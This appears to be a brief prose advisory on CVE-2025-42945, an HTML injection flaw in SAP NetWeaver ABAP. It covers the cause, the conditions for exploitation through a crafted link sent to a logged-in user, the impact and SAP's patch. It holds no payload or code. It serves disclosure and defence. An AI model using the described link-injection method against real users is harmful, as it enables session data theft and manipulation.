CVE-2025-42945

Vulnerability

Analysis

CVE-2025-42945 describes an HTML injection vulnerability in SAP NetWeaver Application Server ABAP. The root cause lies in insufficient sanitization of user-supplied input when constructing URLs or web pages. This allows an attacker to embed arbitrary HTML or script content into a link that appears legitimate. The official description confirms that a crafted URL with a malicious script payload can be used to exploit the issue [1].

Exploitation

Conditions

To exploit this vulnerability, an attacker must trick an authenticated user into clicking the malicious URL. The user must have an active session with the vulnerable SAP system. No special privileges are required for the attacker beyond crafting the link and delivering it (e.g., via email or a web page). The injection occurs within the application's response, so the victim's browser executes the injected HTML/script in the context of the trusted SAP application [1].

Impact

Successful exploitation leads to limited access to data or the ability to manipulate data within the scope of the victim's session. The impact is confined to confidentiality and integrity, with a CVSS score of 6.1 (Medium). There is no impact on system availability. The attacker could potentially read or modify sensitive information that the victim user has permission to access, but cannot perform full administrative actions or disrupt service [1].

Mitigation

SAP has addressed this vulnerability through its regular Security Patch Day process. The fix is delivered as an SAP Security Note, which should be applied to affected NetWeaver Application Server ABAP systems. SAP recommends implementing the correction promptly, following the standard maintenance strategy for medium-priority notes. For detailed patching instructions, administrators should refer to the SAP Security Notes portal [1].